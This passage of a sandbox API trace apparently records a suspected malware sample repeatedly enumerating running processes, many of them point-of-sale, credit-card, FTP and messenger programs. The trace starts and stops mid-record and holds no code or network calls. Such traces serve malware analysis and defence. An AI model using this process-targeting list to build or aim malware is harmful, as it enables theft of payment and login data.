th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0235.911] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0235.914] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0235.916] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0235.920] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0235.922] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0235.924] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0235.926] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0235.928] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0235.930] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0235.933] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0235.935] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0235.937] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0235.944] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0235.947] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0235.950] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0235.953] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0235.956] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0235.959] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0235.961] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0235.963] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0235.965] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0235.967] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0235.969] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0235.972] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0235.974] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0235.976] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0235.978] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0235.989] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0235.992] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0235.995] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0235.997] Process32Next (in: hSnapshot=0x227c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0235.999] CloseHandle (hObject=0x227c) returned 1 [0235.999] Sleep (dwMilliseconds=0x64) [0236.119] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2280 [0236.133] Process32First (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.136] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0236.138] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0236.141] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.143] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0236.145] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0236.169] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0236.172] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0236.175] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0236.218] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.221] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.226] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0236.228] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.231] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.234] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.236] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.238] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.241] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.243] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.246] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0236.249] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0236.251] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0236.298] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0236.301] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.303] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0236.306] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0236.309] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0236.312] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0236.314] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0236.316] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0236.318] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.321] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.324] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0236.326] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.329] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.333] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0236.405] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0236.408] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0236.410] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0236.412] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0236.415] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0236.417] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0236.419] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0236.422] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0236.423] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0236.427] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0236.430] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0236.432] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0236.434] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0236.437] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0236.439] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0236.483] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0236.485] Process32Next (in: hSnapshot=0x2280, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, 